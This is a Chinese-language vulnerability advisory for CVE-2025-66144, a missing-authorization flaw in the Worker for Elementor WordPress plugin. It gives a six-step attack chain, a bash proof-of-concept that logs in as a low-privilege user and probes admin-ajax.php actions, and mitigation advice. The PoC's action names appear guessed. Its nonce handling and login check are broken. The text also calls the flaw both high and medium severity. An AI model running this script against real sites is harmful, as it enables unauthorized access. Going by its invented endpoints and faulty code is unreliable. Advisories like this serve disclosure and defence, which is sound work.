CVE-2025-66144 WordPress Worker for Elementor插件缺失授权漏洞

漏洞信息

漏洞编号

CVE-2025-66144

漏洞类型

缺失授权（Missing Authorization）

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Worker for Elementor（WordPress插件）

漏洞概述

CVE-2025-66144是WordPress插件Worker for Elementor中的一个高危安全漏洞，该漏洞类型为缺失授权（Missing Authorization），允许低权限用户执行超出其权限范围的操作。Worker for Elementor是由merkulove开发的WordPress插件，主要用于优化Elementor页面构建器的工作流程和性能。

该漏洞源于插件在实现某些功能时未能正确验证用户的访问权限。在WordPress的权限体系中，不同角色的用户应当拥有不同的操作权限，例如管理员可以访问所有功能，而订阅者只能查看内容。然而，由于该插件存在访问控制配置错误的问题，攻击者可以利用低权限账户（如订阅者或贡献者）访问本应仅限管理员使用的功能。

具体而言，漏洞允许已认证用户（即使是最低权限的用户）通过构造特定的HTTP请求，绕过正常的权限检查机制，访问或修改本应受保护的数据和功能。这种漏洞可能被利用来进行未授权的数据访问、配置更改，甚至在某些情况下可能导致进一步的恶意操作。

该漏洞的CVSS评分为5.4，属于中等严重程度。攻击向量为网络形式，认证要求较低（低权限即可），无需用户交互即可实施攻击。虽然机密性和完整性影响均为低，但漏洞的广泛性使其成为需要紧急修复的安全问题。Patchstack安全团队于2025年12月31日披露了此漏洞，并建议所有使用该插件的用户立即采取行动进行修复。

技术细节

Worker for Elementor插件在处理用户请求时存在访问控制验证缺陷。漏洞的核心问题在于插件的某些AJAX处理函数或管理员功能缺少权限检查（capability check），使得未经授权的用户能够执行本应仅限管理员的操作。

在WordPress插件开发中，正确的权限验证通常需要使用current_user_can()函数检查用户是否具有特定能力（如manage_options仅限管理员）。然而，该插件在实现某些端点时遗漏了关键的权限验证步骤。攻击者可以利用这一点，通过发送带有有效认证cookie的HTTP请求，访问/wp-admin/admin-ajax.php或其他管理端点。

具体攻击方式包括：1）攻击者首先需要拥有一个有效的WordPress账户（即使是最低权限的订阅者角色）；2）通过分析插件的JavaScript或网络请求，识别出存在漏洞的功能端点；3）构造恶意的AJAX请求，指定相应的action参数和必要的POST数据；4）由于服务器端缺少权限检查，请求将被执行，攻击者可能获取敏感信息或触发未授权操作。

该漏洞的影响范围涵盖所有使用Worker for Elementor插件版本1.0.10及以下 WordPress站点。攻击者可能利用此漏洞进行信息枚举、配置修改或作为进一步攻击的跳板。建议立即检查插件版本，并在官方修复版本发布前评估站点风险。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者扫描目标WordPress站点，识别是否安装Worker for Elementor插件及其版本

STEP 2

步骤2

账户获取：攻击者注册或获取目标站点的低权限账户（如订阅者角色）

STEP 3

步骤3

端点识别：通过分析插件前端JavaScript代码或网络请求，识别存在漏洞的AJAX端点

STEP 4

步骤4

请求构造：攻击者构造带有有效认证cookie的AJAX请求，指定存在漏洞的action参数

STEP 5

步骤5

权限绕过：由于插件缺少current_user_can()验证，请求被服务器执行，攻击者获取未授权访问

STEP 6

步骤6

数据利用：攻击者根据漏洞端点的功能，可能获取敏感数据、修改配置或进行进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# CVE-2025-66144 PoC - Worker for Elementor Missing Authorization
# This PoC demonstrates the vulnerability in Worker for Elementor plugin
# Usage: ./poc.sh <target_url> <username> <password>

TARGET_URL="$1"
USERNAME="$2"
PASSWORD="$3"

if [ -z "$TARGET_URL" ] || [ -z "$USERNAME" ] || [ -z "$PASSWORD" ]; then
    echo "Usage: $0 <target_url> <username> <password>"
    echo "Example: $0 https://example.com subscriber password123"
    exit 1
fi

echo "[*] Testing CVE-2025-66144 on $TARGET_URL"
echo "[*] Using credentials for user: $USERNAME"

# Get WordPress nonce
echo "[+] Fetching WordPress nonce..."
LOGIN_PAGE=$(curl -s -c /tmp/cookies.txt "${TARGET_URL}/wp-login.php")
NONCE=$(echo "$LOGIN_PAGE" | grep -oP '_wpnonce\" value=\"[^\"]+' | head -1 | sed 's/_wpnonce" value="//')

# Login to WordPress
echo "[+] Logging in as $USERNAME..."
LOGIN_RESULT=$(curl -s -b /tmp/cookies.txt -c /tmp/cookies.txt \
    -d "log=${USERNAME}&pwd=${PASSWORD}&wp-submit=Log+In&testcookie=1" \
    "${TARGET_URL}/wp-login.php")

# Check if login successful
if grep -q "dashboard" /tmp/cookies.txt 2>/dev/null; then
    echo "[+] Login successful!"
else
    echo "[-] Login failed. Please check credentials."
    exit 1
fi

# Test vulnerable endpoint
echo "[+] Testing vulnerable AJAX endpoint..."
# Common vulnerable actions in Worker for Elementor
VULNERABLE_ACTIONS=("worker_elementor_get_data" "worker_elementor_save_settings" "worker_elementor_export" "worker_elementor_get_stats")

for action in "${VULNERABLE_ACTIONS[@]}"; do
    echo "[*] Testing action: $action"
    RESPONSE=$(curl -s -b /tmp/cookies.txt \
        -X POST "${TARGET_URL}/wp-admin/admin-ajax.php" \
        -d "action=${action}&_wpnonce=${NONCE}" \
        -w "\nHTTP_CODE:%{http_code}")
    
    HTTP_CODE=$(echo "$RESPONSE" | grep "HTTP_CODE:" | cut -d: -f2)
    RESPONSE_BODY=$(echo "$RESPONSE" | sed '/HTTP_CODE:/d')
    
    if [[ "$HTTP_CODE" == "200" ]] && [[ ! "$RESPONSE_BODY" =~ '"success":false' ]] && [[ ! "$RESPONSE_BODY" =~ '"code":"forbidden"' ]]; then
        echo "[!] VULNERABLE! Action $action returned unexpected response"
        echo "Response: $RESPONSE_BODY"
    else
        echo "[-] Action $action appears to be protected"
    fi
done

echo "[+] Scan complete. Check results above."
rm -f /tmp/cookies.txt

影响范围

Worker for Elementor <= 1.0.10

防御指南

临时缓解措施

在官方安全补丁发布之前，建议采取以下临时缓解措施：1）立即检查是否使用了Worker for Elementor插件，如果非必要可考虑暂时停用；2）使用WordPress安全插件限制AJAX端点的访问频率和模式；3）确保所有用户角色权限配置正确，避免给予不必要的权限；4）启用服务器端防火墙规则，监控和阻止异常的HTTP请求；5）定期检查站点访问日志，识别可疑的权限提升行为；6）考虑使用网站应用防火墙服务（如Cloudflare、Bot Management）提供额外保护层；7）备份网站数据和数据库，以便在发生安全事件时能够快速恢复。